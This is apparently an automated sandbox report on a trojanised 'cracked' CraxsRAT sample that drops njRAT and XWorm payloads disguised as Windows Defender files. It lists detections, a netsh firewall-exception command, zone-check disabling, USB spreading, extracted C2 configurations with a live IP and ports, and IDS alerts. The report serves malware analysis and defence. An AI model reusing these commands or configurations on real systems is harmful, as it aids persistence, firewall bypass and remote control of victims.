Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables zone checking for all users

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

Jump to behavior

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.145.41.178	unknown	Moldova Republic of		41228	NNT-AS41228LT	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.145.41.178	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: CraxsRAT v7.6 Cracked.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Avira: detection malicious, Label: ANDROID/SpyNote.mcdzu
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["45.145.41.178"], "Port": 1111, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "Porno.exe", "Version": "XWorm V5.6"}
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack	Malware Configuration Extractor: Njrat {"Host:Port": ["45.145.41.178:2222"], "Campaign ID": "HacKed", "Install File": "Windows Defender Real Time Protection.exe", "Install Folder": "TEMP", "Version": "0.12G", "Network Seprator": "\|'\|'\|"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Virustotal: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Virustotal: Detection: 67%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Virustotal: Detection: 76%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: CraxsRAT v7.6 Cracked.exe	ReversingLabs: Detection: 63%
Source: CraxsRAT v7.6 Cracked.exe	Virustotal: Detection: 54%			Perma Link

Yara detected Njrat

Source: Yara match	File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: CraxsRAT v7.6 Cracked.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: 45.145.41.178
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: 1111
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: <123456789>
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: Porno.exe
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: %AppData%
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack	String decryptor: Windows Defender Notification.exe

Uses 32bit PE files

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Spreading

Contains functionality to spread to USB devices (.Net source)

Source: Windows Defender Real Time Protection.exe.0.dr, OK.cs	.Net Code: USBspr
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, OK.cs	.Net Code: USBspr
Source: 0e75fed00639ea9e725255499292dcdd.exe.2.dr, OK.cs	.Net Code: USBspr

May infect USB drives

Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autorun.inf![autorun]
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autorun.inf![autorun]
Source: Windows Defender Real Time Protection.exe, 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: autorun.inf![autorun]
Source: Windows Defender Real Time Protection.exe, 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: autorun.inf![autorun]
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autorun.inf
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [autorun]

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53740 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53756 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53756 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53740 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53783 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53799 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53707 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:63387 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53783 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:63387 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53799 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53707 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53723 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53723 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53772 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53772 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53827 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53827 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53841 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53841 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53814 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53814 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53876 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53876 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53859 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53859 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53891 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53891 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53904 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53904 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53922 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53922 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53940 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53968 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53968 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53968 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53940 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53957 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53977 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53977 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53985 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53957 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53985 -> 45.145.41.178:2222
